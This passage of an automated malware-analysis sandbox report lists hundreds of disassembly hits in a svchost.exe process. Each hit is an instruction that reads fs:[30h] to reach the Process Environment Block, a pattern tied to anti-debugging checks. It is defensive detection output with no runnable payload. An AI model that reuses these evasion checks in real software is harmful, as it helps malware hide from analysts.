          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]1_2_0335438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]1_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]1_2_033663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]1_2_033403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h]1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]1_2_033DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]1_2_033D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]1_2_033EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]1_2_0333A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]1_2_033383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]1_2_033B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]1_2_0332823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]1_2_0332826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]1_2_0332A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]1_2_03336259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h]1_2_033B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h]1_2_033B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]1_2_03360124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h]1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]1_2_033F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]1_2_0332C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]1_2_033C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h]1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]1_2_034061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]1_2_03370185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]1_2_033601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]1_2_033C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]1_2_0332A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]1_2_0332C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]1_2_033B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]1_2_0335C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]1_2_03332050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]1_2_033B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]1_2_033F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]1_2_033F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]1_2_033C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]1_2_0333208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]1_2_0332C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]1_2_033720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0332A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]1_2_033380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]1_2_033B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]1_2_033B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]1_2_033AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]1_2_03330710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]1_2_03360710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]1_2_0336C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]1_2_03338770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]1_2_03330750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]1_2_033BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]1_2_033B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]1_2_033307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]1_2_033E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]1_2_033D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]1_2_033BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]1_2_0333C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]1_2_033B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]1_2_0334E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]1_2_03366620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]1_2_03368620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]1_2_0333262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]1_2_03372619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]1_2_033AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
